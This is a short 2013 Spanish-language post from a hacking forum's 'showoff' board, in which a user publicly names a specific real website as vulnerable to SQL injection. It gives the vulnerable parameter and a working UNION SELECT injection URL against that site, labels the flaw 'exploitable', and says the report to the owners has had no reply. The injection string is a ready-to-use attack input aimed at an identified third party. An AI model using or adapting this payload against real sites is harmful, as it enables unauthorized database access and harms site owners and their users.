Underc0de

[In]Seguridad Informática => Bugs y Exploits => Hacking ShowOff => Mensaje iniciado por: Matabarras en Marzo 09, 2013, 12:05:40 PM

Título: SQLI http://www.informaticovitoria.com
Publicado por: Matabarras en Marzo 09, 2013, 12:05:40 PM
Bueno despues de que me sigan en Twitter, me dio por mirar la web, dado que son 'informáticos' o así lo dice los titulos de su carrera.

Conclusión, acabe cabreado al observar que personas con carreras en la rama informática, dispongas de fallos tan comunes en sus sitios web.

Path vulnerable:
http://www.informaticovitoria.com/index.php?seccion=
-----------------------------------------------------------------------
http://www.informaticovitoria.com/index.php?seccion=noticia&id=1+union+select+1,2,3,4,5,6,7

Screenshot:
(http://i.imgur.com/Kfski45.png)

Estado: Explotable.
Reportado: Si(Sin respuesta todavía por parte de los administradores)
Fecha del hallazgo: 9-3-2013.
Autor: Matabarras.